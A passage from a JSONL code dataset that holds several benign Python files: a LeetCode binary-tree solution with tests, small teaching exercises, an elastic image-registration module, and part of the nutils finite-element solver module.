nodes.append(node.left)\n operators.append(operator_expand)\n elif operator == operator_eval:\n result.append(node)\n\n return result\n\n\nclass TestTreeNode(unittest.TestCase):\n def test_basic(self):\n tree = TreeNode.construct_maximum_binary_tree([3, 2, 1, 6, 0, 5])\n nums = tree.level_order_traversal_for_value()\n\n self.assertEqual(tree.val, 6)\n self.assertEqual(tree.left.val, 3)\n self.assertEqual(tree.right.val, 5)\n self.assertEqual(nums, [6, 3, 5, None, 2, 0, None, None, 1])\n\n def test_minimum(self):\n tree = TreeNode.construct_maximum_binary_tree([3, 2, 1])\n nums = tree.level_order_traversal_for_value()\n\n self.assertEqual(tree.val, 3)\n self.assertTrue(tree.left is None)\n self.assertEqual(tree.right.val, 2)\n self.assertEqual(nums, [3, None, 2, None, 1])\n\n def test_single(self):\n tree = TreeNode.construct_maximum_binary_tree([7])\n nums = tree.level_order_traversal_for_value()\n\n self.assertEqual(tree.val, 7)\n self.assertTrue(tree.left is None)\n self.assertTrue(tree.right is None)\n self.assertEqual(nums, [7])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/leetcode/maximum_binary_tree.py","file_name":"maximum_binary_tree.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361425008","text":"#Here is a list of faculty teaching this MOOC. Can you write a function and apply it using map() to get a list of all faculty titles and last names (e.g. ['Dr. Brooks', 'Dr. Collins-Thompson', …]) ?\n\npeople = ['Dr. Christopher Brooks', 'Dr. Kevyn Collins-Thompson', 'Dr. VG Vinod Vydiswaran', 'Dr. Daniel Romero']\n\n#def split_title_and_name(person):\n# return #Your answer here\n#\n#list(map(#Your answer here))\n\ndef split_title_and_name(person):\n x = person.split(\" \")\n return x[0] + \" \" + x[2]\n\nlist(map(split_title_and_name, people))","sub_path":"week1-python-fundamentals/advanced-python-objects-map.py","file_name":"advanced-python-objects-map.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"464268329","text":"# estudo de como utilizar mod em python\n\nnum1 = float(input(\"Digite um valor: \")) #o float() transforma os dados obtidos para valor float.\nnum2 = float(input(\"Digite outro valor: \"))\n\ndivisao = num1 // num2 #ignora as casa decimais, sendo assim so eh lido o valor inteiro.\n\nresto = num1 % num2\n\nprint(num1, \" dividio por \", num2, \" é igual a \", divisao, \" com resto \", resto)","sub_path":"Mod/Mod.py","file_name":"Mod.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"394256682","text":"def linear_search(the_value,target):\r\n n = len(the_value)\r\n for i in range(n):\r\n if the_value[i] == target:\r\n return True\r\n return False\r\n\r\n\r\nli = [1,2,3,4,5,6,7]\r\ntar = int(input(\"Enter target number: \"))\r\nprint(linear_search(li,tar))","sub_path":"liner_search.py","file_name":"liner_search.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"108589212","text":"from skimage.filters import gaussian\nfrom skimage.io import imsave\nfrom spline_registration.utils import coordenades_originals, visualitza_malla, color_a_grisos, ampliacio_malla\nimport numpy as np\nimport random\nfrom scipy.optimize import least_squares\nfrom spline_registration.losses import SSD, info_mutua\nfrom skimage import feature\nfrom PIL import Image\n\n\nclass BaseTransform:\n def __init__(self, mida_malla, dim_imatge):\n self.dim_imatge = dim_imatge\n self.nx = mida_malla[:, 0]\n self.ny = mida_malla[:, 1]\n self.perturbacio = None\n self.diff_step = None\n self.chi = None\n self.gamma = None\n\n def imatge_gaussian(self, imatge, multichanel=True):\n sigma = (imatge.shape[0] / 3 + imatge.shape[1] / 3) * 1 / 5\n imatge_gaussian = gaussian(imatge, sigma=sigma, multichannel=multichanel)\n return imatge_gaussian\n\n def parametres_a_malla(self, parametres, i):\n files = self.nx[i] + 1\n columnes = self.ny[i] + 1\n malla_x = parametres[0: files * columnes].reshape(files, columnes)\n malla_y = parametres[files*columnes: 2*files*columnes].reshape(files, columnes)\n return malla_x, malla_y\n\n def malla_inicial(self, i):\n nx = self.nx[i]\n ny = self.ny[i]\n delta = [int(self.dim_imatge[0] / nx) + 1, int(self.dim_imatge[1] / ny) + 1]\n\n '''\n el +1 ens permet assegurar que la darrera fila/columna de la malla estan defora de la imatge.\n Ja que així creant aquests punts ficticis a fora podem interpolar totes les posicions de la imatge. \n Ara la malla serà (nx+1)*(ny+1).\n '''\n malla = np.mgrid[0: (nx + 1) * delta[0]: delta[0], 0: (ny + 1) * delta[1]: delta[1]]\n malla_x = malla[0] # inicialitzam a on van les coordenades x a la imatge_reference\n malla_y = malla[1] # inicialitzam a on van les coordenades y a la imatge_reference\n malla_vector = np.concatenate((malla_x.ravel(), malla_y.ravel()), axis=0)\n\n return malla_vector\n\n def perturbar_malla_aleatoriament(self, malla_vector, imatge_input, iteracions, i):\n\n malla_x, malla_y = self.parametres_a_malla(malla_vector, i)\n Coord_originals_x, Coord_originals_y = coordenades_originals(imatge_input)\n\n nx = self.nx[i]\n ny = self.ny[i]\n delta = [int(self.dim_imatge[0] / nx) + 1, int(self.dim_imatge[1] / ny) + 1]\n perturbacio = self.perturbacio\n\n epsilon1 = np.zeros(malla_x.shape)\n epsilon2 = np.zeros(malla_y.shape)\n if iteracions > 0:\n for i in range(0, malla_x.shape[0]):\n for j in range(0, malla_x.shape[1]):\n epsilon1[i, j] = random.randrange(-int(delta[0] * perturbacio), int(delta[0] * perturbacio))\n for i in range(0, malla_y.shape[0]):\n for j in range(0, malla_y.shape[1]):\n epsilon2[i, j] = random.randrange(-int(delta[1] * perturbacio), int(delta[1] * perturbacio))\n\n malla_x = malla_x + epsilon1\n malla_y = malla_y + epsilon2\n return malla_x, malla_y, Coord_originals_x, Coord_originals_y\n\n def posicio(self, x, y, malla_x, malla_y, i):\n # s val 0 quan la x està a coordenadesx\n # t val 0 quan la y està a coordenadesy\n # i index de la posició més pròxima per davall de la coordenada x a la malla\n # j index de la posició més pròxima per davall de la coordenada y a la malla\n\n nx = self.nx[i]\n ny = self.ny[i]\n delta = [int(self.dim_imatge[0] / nx) + 1, int(self.dim_imatge[1] / ny) + 1]\n\n s, i = np.modf(x / delta[0]) # i part entera del nombre x / delta[0]; s la seva part decimal\n t, j = np.modf(y / delta[1])\n i = np.minimum(np.maximum(i.astype('int'), 0), nx)\n j = np.minimum(np.maximum(j.astype('int'), 0), ny)\n\n interpolacio = np.array([(s - 1) * (t - 1) * malla_x[i, j] + s * (1 - t) * malla_x[i + 1, j]\n + (1 - s) * t * malla_x[i, j + 1] + s * t * malla_x[i + 1, j + 1],\n (s - 1) * (t - 1) * malla_y[i, j] + s * (1 - t) * malla_y[i + 1, j]\n + (1 - s) * t * malla_y[i, j + 1] + s * t * malla_y[i + 1, j + 1]\n ])\n\n return interpolacio\n\n def imatge_transformada(self, imatge_input, coord_desti):\n '''\n Introduim la imatge_input i les coordenades a les quals es mouen les originals després d'aplicar l'interpolació.\n El que volem es tornar la imatge registrada que tengui a les coordenades indicades els colors originals:\n\n Per fer-ho definesc una imatge registrada (inicialment tota negre) i a les coordenades del destí\n anar enviant els colors originals.\n '''\n\n coord_desti = np.round(coord_desti).astype('int') # Discretitzar\n coord_desti = np.maximum(coord_desti, 0)\n coord_desti[0] = np.minimum(coord_desti[0], imatge_input.shape[0] - 1)\n coord_desti[1] = np.minimum(coord_desti[1], imatge_input.shape[1] - 1)\n\n Coord_originals_x, Coord_originals_y = coordenades_originals(imatge_input)\n\n registered_image = np.zeros_like(imatge_input)\n registered_image[Coord_originals_x, Coord_originals_y] = imatge_input[coord_desti[0], coord_desti[1]]\n return registered_image\n\n def transformar(self, imatge, parametres, i):\n\n malla_x, malla_y = self.parametres_a_malla(parametres, i)\n Coord_originals_x, Coord_originals_y = coordenades_originals(imatge)\n\n Coordenades_desti = self.posicio(Coord_originals_x, Coord_originals_y, malla_x, malla_y, i)\n\n return self.imatge_transformada(imatge, Coordenades_desti)\n\n def montecarlo(self, malla_vector, imatge_input, imatge_reference, path_carpeta_experiment, fitxer_sortida,\n nombre_execucions, i):\n mx = self.nx[i] + 1\n my = self.ny[i] + 1\n diff_step = self.diff_step\n gamma = self.gamma\n chi = self.chi\n\n valors_optims = 20\n parametres_optims = 0\n\n for num_exec in range(1, nombre_execucions):\n\n malla_x, malla_y, Coord_originals_x, Coord_originals_y = self.perturbar_malla_aleatoriament(\n malla_vector, imatge_input, num_exec, i)\n\n funcio_min_residus = lambda x: self.residus(x, imatge_input, imatge_reference, i)\n\n resultat = least_squares(funcio_min_residus, x0=np.concatenate([malla_x.flatten(), malla_y.flatten()]),\n diff_step=diff_step, gtol=1e-12, xtol=1e-13, ftol=1e-13,\n method='lm', verbose=2)\n\n parametres = resultat.x\n val_parametres = resultat.cost\n residus = funcio_min_residus(parametres)\n\n residuals_error = residus[0:-3]/(1-gamma-chi)\n sum_residuals = np.sum(residuals_error**2)\n min = np.min(residuals_error)\n max = np.max(residuals_error)\n mean = np.mean(residuals_error)\n sd_malla = residus[-3:-1]/gamma\n contorn = residus[-1]/chi\n\n fitxer_sortida.write(f'''{num_exec}:\n \\n {resultat}\\n\n \\n{gamma,chi}:\n min,max,mean dels residus colors originals,suma:{min,max,mean,sum_residuals},\n regularitzacio malla : {sd_malla},\n contorn : {contorn}\\n\n ''')\n imatge_registrada_input = self.transformar(imatge_input, parametres, i)\n imsave(f'{path_carpeta_experiment}/{num_exec:02d}_imatge_registrada{mx,my}_{val_parametres}.png',\n imatge_registrada_input)\n\n # edges\n edges_registrada = self.edges(imatge_registrada_input)\n imsave(f'{path_carpeta_experiment}/{num_exec:02d}_contorn_registrada_{mx,my}.png', edges_registrada)\n\n if val_parametres < valors_optims:\n valors_optims = val_parametres\n parametres_optims = parametres\n\n return valors_optims, parametres_optims\n\n def guardar_millor_imatge_registrada(self, imatge_input, imatge_reference, malla_vector,\n path_carpeta_experiment, fitxer_sortida, iteracions, i):\n\n millorsresultats = self.montecarlo(malla_vector, imatge_input, imatge_reference,\n path_carpeta_experiment, fitxer_sortida, iteracions, i)\n valors_optims = millorsresultats[0]\n parametres_optims = millorsresultats[1]\n\n mx = self.nx[i] + 1\n my = self.ny[i] + 1\n millor_malla_preliminar = self.parametres_a_malla(parametres_optims, i)\n\n fitxer_sortida.write(f'\\n\\n\\n Els millors paràmetres amb una malla {mx} per {my} són: \\n {parametres_optims}\\n\\n\\n')\n imatge_registrada = self.transformar(imatge_input, parametres_optims, i)\n imsave(f'{path_carpeta_experiment}/imatge_registrada_{mx, my}_{valors_optims}.png',\n imatge_registrada)\n return millor_malla_preliminar\n\n def find_best_transform(self, input_image, reference_image, path_carpeta_experiment, fitxer_sortida, iteracions):\n malla_vector = self.malla_inicial(0)\n\n for i in range(0, 2):\n millor_malla_preliminar = self.guardar_millor_imatge_registrada(input_image, reference_image, malla_vector,\n path_carpeta_experiment, fitxer_sortida,\n iteracions[i], i)\n\n malla_ampliada = ampliacio_malla(millor_malla_preliminar[0], millor_malla_preliminar[1])\n malla_vector = [malla_ampliada[0].ravel(), malla_ampliada[1].ravel()]\n malla_vector = np.asarray(malla_vector).ravel()\n\n millor_malla_preliminar = self.guardar_millor_imatge_registrada(input_image, reference_image, malla_vector,\n path_carpeta_experiment, fitxer_sortida,\n iteracions[2], 2)\n parametres_optims = np.asarray([millor_malla_preliminar[0].ravel(), millor_malla_preliminar[1].ravel()])\n\n fitxer_sortida.write(f'\\n\\n\\n Els millors paràmetres amb una malla 9 per 9 són: \\n {parametres_optims}\\n')\n\n return parametres_optims\n\n def apply_transform(self, input_image, parametres):\n imatge_registrada = self.transformar(input_image, parametres, 2)\n return imatge_registrada\n\n def visualize_transform(self,input_image, registered_image, reference_image, parametres, path_carpeta_experiment, error):\n\n imsave(f'{path_carpeta_experiment}/imatge_reference.png', reference_image)\n mx, my = self.nx[-1]+1, self.ny[-1]+1\n malla_original = self.parametres_a_malla(self.malla_inicial(2),2)\n millor_malla = self.parametres_a_malla(parametres, 2)\n\n visualitza_malla(registered_image, malla_original[0], malla_original[1],\n f'malla imatge registrada optima {mx, my}',\n f'{path_carpeta_experiment}/malla {mx, my} sobre imatge registrada.png')\n\n visualitza_malla(input_image, millor_malla[0], millor_malla[1],\n f'malla imatge registrada optima {mx, my}',\n f'{path_carpeta_experiment}/malla {mx, my} sobre la imatge d´entrada .png')\n imsave(f'{path_carpeta_experiment}/imatge_registrada_{mx, my}_{error}.png',\n registered_image)\n im1 = Image.open(f'{path_carpeta_experiment}/imatge_reference.png').convert('L')\n im2 = Image.open(f'{path_carpeta_experiment}/imatge_registrada_{mx, my}_{error}.png').convert('L')\n im = Image.blend(im1, im2, 0.5)\n path_imatge_blend = f'{path_carpeta_experiment}/imatge_blend.png'\n im.save(path_imatge_blend)\n\n\nclass ElasticTransform_SSD(BaseTransform):\n def __init__(self, mida_malla, dim_imatge):\n self.dim_imatge = dim_imatge\n self.nx = mida_malla[:, 0]\n self.ny = mida_malla[:, 1]\n self.diff_step = None\n self.gamma = 0.2\n self.chi = 0.08\n self.perturbacio = 1 / 5\n def edges(self, imatge):\n sigma = (imatge.shape[0] / 10 + imatge.shape[1] / 10) * 1 / 5\n imatge_gaussian = gaussian(imatge, sigma=sigma, multichannel=False)\n edges = feature.canny(imatge_gaussian)\n edges = np.where(edges == True, 1, 0)\n return edges\n\n def residus(self, parametres, imatge_input, imatge_reference, i):\n gamma = self.gamma\n chi = self.chi\n beta = 1 - gamma - chi\n\n # definim les imatges registrada inicial, la registrada amb filtratge gaussià\n # i la referència amb filtratge gaussià\n regist_img = self.transformar(imatge_input, parametres, i)\n # enviam les coord_originals de la imatge input a les coor_desti\n gaus_reg_img = self.imatge_gaussian(regist_img)\n gaus_ref_img = self.imatge_gaussian(imatge_reference)\n\n # calculam el factor de regularització que depen dels edges\n regist_edges = self.edges(regist_img)\n ref_edges = self.edges(imatge_reference)\n sum_regist_edges = np.sum(regist_edges)\n dif_edge = np.abs(regist_edges - ref_edges)\n sum_dif_edge = np.sum(dif_edge)\n residuals_edge = sum_dif_edge / sum_regist_edges\n\n # calculam el factor de regularització que depen dels punts de la malla\n malla_x, malla_y = self.parametres_a_malla(parametres, i)\n\n mx_col_post, my_col_post = malla_x[:, 1:], malla_y[:, 1:]\n mx_fila_post, my_fila_post = malla_x[1:, :], malla_y[1:, :]\n\n d1 = np.sqrt(np.power((mx_col_post - malla_x[:, 0:-1]), 2) + np.power((my_col_post - malla_y[:, 0:-1]), 2))\n d2 = np.sqrt(np.power((mx_fila_post - malla_x[0:-1, :]), 2) + np.power((my_fila_post - malla_y[0:-1, :]), 2))\n sd1 = np.std(d1)\n sd2 = np.std(d2)\n residuals_malla = np.asarray([sd1, sd2])\n\n # calculam els residus obtinguts de comparar pixel a pixel les imatges tant originals com gaussianes\n dif_quad = np.power((regist_img - imatge_reference).flatten(), 2)\n dif_quad_gaus = np.power((gaus_reg_img - gaus_ref_img).flatten(), 2)\n\n # return np.concatenate([dif_quad_gaus / sum(dif_quad_gaus), gamma * residuals_malla])\n den = sum(dif_quad + dif_quad_gaus)\n if den == 0:\n den = 1\n\n residuals_dif = np.concatenate([dif_quad,dif_quad_gaus])/den\n\n return np.concatenate([beta * residuals_dif,\n gamma * residuals_malla,\n [chi * residuals_edge ]])\n\n\nclass ElasticTransform_IM (BaseTransform):\n def __init__(self, mida_malla, dim_imatge):\n self.dim_imatge = dim_imatge\n self.nx = mida_malla[:, 0]\n self.ny = mida_malla[:, 1]\n self.diff_step = None\n self.gamma = 0.1\n self.chi = 0.08\n self.perturbacio = 1 / 5\n\n def edges(self, imatge):\n edges = feature.canny(color_a_grisos(imatge))\n edges = np.where(edges == True, 1, 0)\n return edges\n\n def residus(self, parametres, imatge_input, imatge_reference, i):\n gamma = self.gamma\n chi = self.chi\n\n imatge_registrada = self.transformar(imatge_input, parametres, i) # enviam les coord_originals de la imatge input a les coor_desti\n\n edges_registrada = self.edges(imatge_registrada)\n edges_reference = self.edges(imatge_reference)\n sum_edges_registrada = np.sum(edges_registrada)\n sum_edges_reference = np.sum(edges_reference)\n dif_edge = np.abs(edges_registrada-edges_reference)\n\n malla_x, malla_y = self.parametres_a_malla(parametres, i)\n\n mx_col_post, my_col_post = malla_x[:, 1:], malla_y[:, 1:]\n mx_fila_post, my_fila_post = malla_x[1:, :], malla_y[1:, :]\n\n d1 = np.sqrt(np.power((mx_col_post - malla_x[:, 0:-1]), 2) + np.power((my_col_post - malla_y[:, 0:-1]), 2))\n d2 = np.sqrt(np.power((mx_fila_post - malla_x[0:-1, :]), 2) + np.power((my_fila_post - malla_y[0:-1, :]), 2))\n sd1 = np.std(d1)\n sd2 = np.std(d2)\n\n residuals_info_mutua_orig = (np.log(np.exp(1))/np.exp(1) - info_mutua(imatge_reference, imatge_registrada, 5))\n residuals_regularizacio = np.asarray([sd1, sd2])\n residuals_edge = np.sum(dif_edge)/(sum_edges_reference + sum_edges_registrada)\n\n beta = 1 - gamma - chi\n return np.concatenate([beta * 100 * residuals_info_mutua_orig / ((5 ** 3) ** 2),\n gamma * residuals_regularizacio,\n [chi * residuals_edge]])\n\n\n\n\n","sub_path":"spline_registration/transform_models.py","file_name":"transform_models.py","file_ext":"py","file_size_in_byte":16753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"612567440","text":"# Copyright (c) 2014 Evalf\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nThe solver module defines the :class:`Integral` class, which represents an\nunevaluated integral. This is useful for fully automated solution procedures\nsuch as Newton, that require functional derivatives of an entire functional.\n\nTo demonstrate this consider the following setup:\n\n>>> from nutils import mesh, function, solver\n>>> ns = function.Namespace()\n>>> domain, ns.x = mesh.rectilinear([4,4])\n>>> ns.basis = domain.basis('spline', degree=2)\n>>> cons = domain.boundary['left,top'].project(0, onto=ns.basis, geometry=ns.x, ischeme='gauss4')\nproject > constrained 11/36 dofs, error 0.00e+00/area\n>>> ns.u = 'basis_n ?lhs_n'\n\nFunction ``u`` represents an element from the discrete space but cannot not\nevaluated yet as we did not yet establish values for ``?lhs``. It can,\nhowever, be used to construct a residual functional ``res``. Aiming to solve\nthe Poisson problem ``u_,kk = f`` we define the residual functional ``res = v,k\nu,k + v f`` and solve for ``res == 0`` using ``solve_linear``:\n\n>>> res = domain.integral('basis_n,i u_,i + basis_n' @ ns, geometry=ns.x, degree=2)\n>>> lhs = solver.solve_linear('lhs', residual=res, constrain=cons)\nsolve > solver returned with residual ...\n\nThe coefficients ``lhs`` represent the solution to the Poisson problem.\n\nIn addition to ``solve_linear`` the solver module defines ``newton`` and\n``pseudotime`` for solving nonlinear problems, as well as ``impliciteuler`` for\ntime dependent problems.\n\"\"\"\n\nfrom . import function, cache, log, util, numeric\nimport numpy, itertools, functools, numbers, collections\n\n\nclass Integral:\n '''Postponed integral, used for derivative purposes'''\n\n def __init__(self, integrands):\n self._integrands = util.hashlessdict((di, f.simplified) for di, f in integrands)\n shapes = {integrand.shape for integrand in self._integrands.values()}\n assert len(shapes) == 1, 'incompatible shapes: {}'.format(' != '.join(str(shape) for shape in shapes))\n self.shape, = shapes\n\n @classmethod\n def multieval(cls, *integrals, fcache=None, arguments=None):\n assert all(isinstance(integral, cls) for integral in integrals)\n if fcache is None:\n fcache = cache.WrapperCache()\n gather = util.hashlessdict()\n for iint, integral in enumerate(integrals):\n for di in integral._integrands:\n gather.setdefault(di, []).append(iint)\n retvals = [None] * len(integrals)\n for (domain, ischeme), iints in gather.items():\n for iint, retval in zip(iints, domain.integrate([integrals[iint]._integrands[domain, ischeme] for iint in iints], ischeme=ischeme, fcache=fcache, arguments=arguments)):\n if retvals[iint] is None:\n retvals[iint] = retval\n else:\n retvals[iint] += retval\n return retvals\n\n def eval(self, **kwargs):\n retval, = self.multieval(self, **kwargs)\n return retval\n\n def derivative(self, target):\n argshape = self._argshape(target)\n arg = function.Argument(target, argshape)\n seen = {}\n return Integral([di, function.derivative(integrand, var=arg, seen=seen)] for di, integrand in self._integrands.items())\n\n def replace(self, arguments):\n return Integral([di, function.replace_arguments(integrand, arguments)] for di, integrand in self._integrands.items())\n\n def contains(self, name):\n try:\n self._argshape(name)\n except KeyError:\n return False\n else:\n return True\n\n def __add__(self, other):\n if not isinstance(other, Integral):\n return NotImplemented\n assert self.shape == other.shape\n integrands = self._integrands.copy()\n for di, integrand in other._integrands.items():\n try:\n integrands[di] += integrand\n except KeyError:\n integrands[di] = integrand\n return Integral(integrands.items())\n\n def __neg__(self):\n return Integral([di, -integrand] for di, integrand in self._integrands.items())\n\n def __sub__(self, other):\n return self + (-other)\n\n def __mul__(self, other):\n if not isinstance(other, numbers.Number):\n return NotImplemented\n return Integral([di, integrand * other] for di, integrand in self._integrands.items())\n\n __rmul__ = __mul__\n\n def __truediv__(self, other):\n if not isinstance(other, numbers.Number):\n return NotImplemented\n return self.__mul__(1/other)\n\n def _argshape(self, name):\n assert isinstance(name, str)\n shapes = {func.shape[:func.ndim-func._nderiv]\n for func in function.Tuple(self._integrands.values()).dependencies\n if isinstance(func, function.Argument) and func._name == name}\n if not shapes:\n raise KeyError(name)\n assert len(shapes) == 1, 'inconsistent shapes for argument {!r}'.format(name)\n shape, = shapes\n return shape\n\n\nclass ModelError(Exception): pass\n\n\ndef solve_linear(target, residual, constrain=None, *, arguments=None, **solveargs):\n '''solve linear problem\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n residual : Integral\n Residual integral, depends on ``target``\n constrain : float vector\n Defines the fixed entries of the coefficient vector\n arguments : :class:`collections.abc.Mapping`\n Defines the values for :class:`nutils.function.Argument` objects in\n `residual`. The ``target`` should not be present in ``arguments``.\n Optional.\n\n Returns\n -------\n vector\n Array of ``target`` values for which ``residual == 0``'''\n\n jacobian = residual.derivative(target)\n if jacobian.contains(target):\n raise ModelError('problem is not linear')\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n argshape = residual._argshape(target)\n arguments = collections.ChainMap(arguments or {}, {target: numpy.zeros(argshape)})\n res, jac = Integral.multieval(residual, jacobian, arguments=arguments)\n return jac.solve(-res, constrain=constrain, **solveargs)\n\n\ndef solve(gen_lhs_resnorm, tol=1e-10, maxiter=numpy.inf):\n '''execute nonlinear solver\n\n Iterates over nonlinear solver until tolerance is reached. Example::\n\n lhs = solve(newton(target, residual), tol=1e-5)\n\n Parameters\n ----------\n gen_lhs_resnorm : generator\n Generates (lhs, resnorm) tuples\n tol : float\n Target residual norm\n maxiter : int\n Maximum number of iterations\n\n Returns\n -------\n vector\n Coefficient vector that corresponds to a smaller than ``tol`` residual.\n '''\n\n try:\n lhs, resnorm = next(gen_lhs_resnorm)\n resnorm0 = resnorm\n inewton = 0\n while resnorm > tol:\n if inewton >= maxiter:\n raise ModelError('tolerance not reached in {} iterations'.format(maxiter))\n with log.context('iter {0} ({1:.0f}%)'.format(inewton, 100 * numpy.log(resnorm0/resnorm) / numpy.log(resnorm0/tol))):\n log.info('residual: {:.2e}'.format(resnorm))\n lhs, resnorm = next(gen_lhs_resnorm)\n inewton += 1\n except StopIteration:\n raise ModelError('generator stopped before reaching target tolerance')\n else:\n log.info('tolerance reached in {} iterations with residual {:.2e}'.format(inewton, resnorm))\n return lhs\n\n\ndef withsolve(f):\n '''add a .solve method to (lhs,resnorm) iterators\n\n Introduces the convenient form::\n\n newton(target, residual).solve(tol)\n\n Shorthand for::\n\n solve(newton(target, residual), tol)\n '''\n\n @functools.wraps(f, updated=())\n class wrapper:\n def __init__(self, *args, **kwargs):\n self.iter = f(*args, **kwargs)\n def __next__(self):\n return next(self.iter)\n def __iter__(self):\n return self.iter\n def solve(self, *args, **kwargs):\n return solve(self.iter, *args, **kwargs)\n return wrapper\n\n\n@withsolve\ndef newton(target, residual, jacobian=None, lhs0=None, constrain=None, nrelax=numpy.inf, minrelax=.1, maxrelax=.9, rebound=2**.5, *, arguments=None, **solveargs):\n '''iteratively solve nonlinear problem by gradient descent\n\n Generates targets such that residual approaches 0 using Newton procedure with\n line search based on a residual integral. Suitable to be used inside\n ``solve``.\n\n An optimal relaxation value is computed based on the following cubic\n assumption::\n\n | res(lhs + r * dlhs) |^2 = A + B * r + C * r^2 + D * r^3\n\n where ``A``, ``B``, ``C`` and ``D`` are determined based on the current and\n updated residual and tangent.\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n residual : Integral\n lhs0 : vector\n Coefficient vector, starting point of the iterative procedure.\n constrain : boolean or float vector\n Equal length to ``lhs0``, masks the free vector entries as ``False``\n (boolean) or NaN (float). In the remaining positions the values of\n ``lhs0`` are returned unchanged (boolean) or overruled by the values in\n `constrain` (float).\n nrelax : int\n Maximum number of relaxation steps before proceding with the updated\n coefficient vector (by default unlimited).\n minrelax : float\n Lower bound for the relaxation value, to force re-evaluating the\n functional in situation where the parabolic assumption would otherwise\n result in unreasonably small steps.\n maxrelax : float\n Relaxation value below which relaxation continues, unless ``nrelax`` is\n reached; should be a value less than or equal to 1.\n rebound : float\n Factor by which the relaxation value grows after every update until it\n reaches unity.\n arguments : :class:`collections.abc.Mapping`\n Defines the values for :class:`nutils.function.Argument` objects in\n `residual`. The ``target`` should not be present in ``arguments``.\n Optional.\n\n Yields\n ------\n vector\n Coefficient vector that approximates residual==0 with increasing accuracy\n '''\n\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n argshape = residual._argshape(target)\n\n if lhs0 is None:\n lhs0 = numpy.zeros(residual.shape)\n else:\n assert numeric.isarray(lhs0) and lhs0.dtype == float and lhs0.shape == residual.shape, 'invalid lhs0 argument'\n\n if constrain is None:\n constrain = numpy.zeros(residual.shape, dtype=bool)\n else:\n assert numeric.isarray(constrain) and constrain.dtype in (bool,float) and constrain.shape == residual.shape, 'invalid constrain argument'\n if constrain.dtype == float:\n lhs0 = numpy.choose(numpy.isnan(constrain), [constrain, lhs0])\n constrain = ~numpy.isnan(constrain)\n\n if jacobian is None:\n jacobian = residual.derivative(target)\n\n if not jacobian.contains(target):\n log.info('problem is linear')\n res, jac = Integral.multieval(residual, jacobian, arguments=collections.ChainMap(arguments or {}, {target: numpy.zeros(argshape)}))\n lhs = jac.solve(-res, lhs0=lhs0, constrain=constrain, **solveargs)\n yield lhs, 0\n return\n\n lhs = lhs0.copy()\n fcache = cache.WrapperCache()\n res, jac = Integral.multieval(residual, jacobian, fcache=fcache, arguments=collections.ChainMap(arguments or {}, {target: lhs}))\n relax = 1\n while True:\n resnorm = numpy.linalg.norm(res[~constrain])\n yield lhs, resnorm\n dlhs = -jac.solve(res, constrain=constrain, **solveargs)\n relax = min(relax * rebound, 1)\n for irelax in itertools.count():\n res, jac = Integral.multieval(residual, jacobian, fcache=fcache, arguments=collections.ChainMap(arguments or {}, {target: lhs+relax*dlhs}))\n newresnorm = numpy.linalg.norm(res[~constrain])\n if irelax >= nrelax:\n if newresnorm > resnorm:\n log.warning('failed to decrease residual')\n return\n break\n if not numpy.isfinite(newresnorm):\n log.info('failed to evaluate residual ({})'.format(newresnorm))\n newrelax = 0 # replaced by minrelax later\n else:\n r0 = resnorm**2\n d0 = -2 * r0\n r1 = newresnorm**2\n d1 = 2 * numpy.dot(jac.matvec(dlhs)[~constrain], res[~constrain])\n log.info('line search: 0[{}]{} {}creased by {:.0f}%'.format('---+++' if d1 > 0 else '--++--' if r1 > r0 else '------', round(relax,5), 'in' if newresnorm > resnorm else 'de', 100*abs(newresnorm/resnorm-1)))\n if r1 <= r0 and d1 <= 0:\n break\n D = 2*r0 - 2*r1 + d0 + d1\n if D > 0:\n C = 3*r1 - 3*r0 - 2*d0 - d1\n newrelax = (numpy.sqrt(C**2-3*d0*D) - C) / (3*D)\n log.info('minimum based on 3rd order estimation: {:.3f}'.format(newrelax))\n else:\n C = r1 - r0 - d0\n # r1 > r0 => C > 0\n # d1 > 0 => C = r1 - r0 - d0/2 - d0/2 > r1 - r0 - d0/2 - d1/2 = -D/2 > 0\n newrelax = -.5 * d0 / C\n log.info('minimum based on 2nd order estimation: {:.3f}'.format(newrelax))\n if newrelax > maxrelax:\n break\n relax *= max(newrelax, minrelax)\n lhs += relax * dlhs\n\n\n@withsolve\ndef pseudotime(target, residual, inertia, timestep, lhs0, residual0=None, constrain=None, *, arguments=None, **solveargs):\n '''iteratively solve nonlinear problem by pseudo time stepping\n\n Generates targets such that residual approaches 0 using hybrid of Newton and\n time stepping. Requires an inertia term and initial timestep. Suitable to be\n used inside ``solve``.\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a 